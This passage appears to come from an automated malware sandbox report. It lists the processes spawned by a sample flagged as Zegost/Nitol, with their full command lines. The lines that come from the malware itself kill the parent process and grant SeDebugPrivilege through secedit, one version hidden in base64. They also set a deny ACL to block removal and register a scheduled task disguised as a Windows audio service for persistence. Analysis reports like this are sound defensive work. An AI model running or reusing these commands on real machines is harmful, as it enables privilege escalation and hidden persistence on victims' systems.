                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:10:09:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:10:09:33
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                                                                                                                  Imagebase:0x7ff784360000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:10:09:33
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                                                                                                                  Imagebase:0xdb0000
                                                                                                                  File size:2'766'808 bytes
                                                                                                                  MD5 hash:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6068e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /c echo.>c:\inst.ini
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\ProgramData\program\iusb3mon.exe
                                                                                                                  Imagebase:0x1d0000
                                                                                                                  File size:2'766'808 bytes
                                                                                                                  MD5 hash:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:10:09:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:36
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:37
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:38
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:39
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:40
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:41
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:42
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:43
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:44
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:45
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:46
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
